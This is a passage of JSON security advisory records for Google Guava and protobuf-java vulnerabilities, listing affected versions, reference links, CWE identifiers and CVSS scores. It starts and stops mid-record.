"https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-173", "CWE-200", "CWE-378", "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2021-03-25T17:01:09Z", "nvd_published_at": "2020-12-10T23:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7g45-4rm6-3mm3", "published": "2023-06-14T18:30:38Z", "modified": "2025-11-04T17:01:34.109082Z", "aliases": [ "CGA-g8pm-vcpp-9jxq", "CVE-2023-2976" ], "related": [ "CGA-3qxr-rw2h-5f86", "CGA-5wxh-2846-4r2x", "CGA-6p73-mwqp-2hp8", "CGA-7xcf-rqw8-qr59", "CGA-955j-7j6c-gqwh", "CGA-cwxg-jg7f-p246", "CGA-gghr-qw4h-4xq9", "CGA-jf73-gm5w-p8jg", "CGA-jwxg-cjjq-4858", "CGA-pp53-gp7c-m793", "CGA-pq38-jvh7-23gx", "CGA-px7h-7xf8-q54x", "CGA-q6xm-fh5w-65wh", "CGA-x223-m8f5-c9vm" ], "summary": "Guava vulnerable to insecure use of temporary directory", "details": "Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.\n\nEven though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "32.0.0-android" } ] } ], "versions": [ "10.0", "10.0-rc1", "10.0-rc2", "10.0-rc3", "10.0.1", "11.0", "11.0-rc1", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre", "24.1.1-android", "24.1.1-jre", "25.0-android", "25.0-jre", "25.1-android", "25.1-jre", "26.0-android", "26.0-jre", "27.0-android", "27.0-jre", "27.0.1-android", "27.0.1-jre", "27.1-android", "27.1-jre", "28.0-android", "28.0-jre", "28.1-android", "28.1-jre", "28.2-android", "28.2-jre", "29.0-android", "29.0-jre", "30.0-android", "30.0-jre", "30.1-android", "30.1-jre", "30.1.1-android", "30.1.1-jre", "31.0-android", "31.0-jre", "31.0.1-android", "31.0.1-jre", "31.1-android", "31.1-jre" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-7g45-4rm6-3mm3/GHSA-7g45-4rm6-3mm3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/2575" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/6532" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://github.com/google/guava/releases/tag/v32.0.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0008" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html" } ], "database_specific": { "cwe_ids": [ "CWE-379", "CWE-552" ], "github_reviewed": true, "github_reviewed_at": "2023-06-14T21:01:07Z", "nvd_published_at": "2023-06-14T18:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mvr2-9pj6-7w5j", "published": "2020-06-15T20:35:11Z", "modified": "2024-10-22T05:29:03.107335Z", "aliases": [ "CGA-8223-gxg7-8cjf", "CVE-2018-10237" ], "related": [ "CGA-4jxw-mwcp-83m9" ], "summary": "Denial of Service in Google Guava", "details": "Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable.", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0" }, { "fixed": "24.1.1-android" } ] } ], "versions": [ "11.0", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "com.google.guava:guava-jdk5", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava-jdk5" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "17.0" } ] } ], "versions": [ "13.0", "14.0.1", "14.0.1-rc1", "16.0", "16.0-rc1", "17.0", "17.0-rc1", "17.0-rc2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "com.googlecode.guava-osgi:guava-osgi", "ecosystem": "Maven", "purl": "pkg:maven/com.googlecode.guava-osgi/guava-osgi" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "11.0.1" } ] } ], "versions": [ "10.0.0", "10.0.1", "11.0.0", "11.0.1", "3.0.0", "4.0.0", "5.0.0", "6.0.0", "7.0.0", "8.0.0", "9.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "de.mhus.ports:vaadin-shared-deps", "ecosystem": "Maven", "purl": "pkg:maven/de.mhus.ports/vaadin-shared-deps" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "7.4.0" } ] } ], "versions": [ "1.3.1", "1.3.4", "1.3.6", "1.3.7", "1.6.0", "1.6.1", "6.2.0", "7.0.0", "7.1.0", "7.2.0", "7.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "org.hudsonci.lib.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/org.hudsonci.lib.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "14.0.1-h-3" } ] } ], "versions": [ "14.0.1-h-1", "14.0.1-h-2", "14.0.1-h-3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "org.sonatype.sisu:sisu-guava", "ecosystem": "Maven", "purl": "pkg:maven/org.sonatype.sisu/sisu-guava" }, "versions": [ "0.11.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10237" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2423" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94@%3Cissues.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220629-0008" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2424" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2425" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2428" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2598" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2643" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2740" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2741" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2742" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://github.com/google/guava/wiki/CVE-2018-10237" }, { "type": "WEB", "url": "https://groups.google.com/d/topic/guava-announce/xqWALw4W1vs/discussion" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041707" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T18:34:57Z", "nvd_published_at": "2018-04-26T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4gg5-vx3j-xwc7", "published": "2022-12-12T15:30:33Z", "modified": "2025-09-02T19:53:43.821640Z", "aliases": [ "CGA-24m5-8f5h-34wq", "CVE-2022-3510" ], "related": [ "CGA-fgmv-5mj3-v9vh", "CGA-g664-j68v-pmw2", "CGA-rh7m-9hc4-75h6" ], "summary": "Protobuf Java vulnerable to Uncontrolled Resource Consumption", "details": "A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": 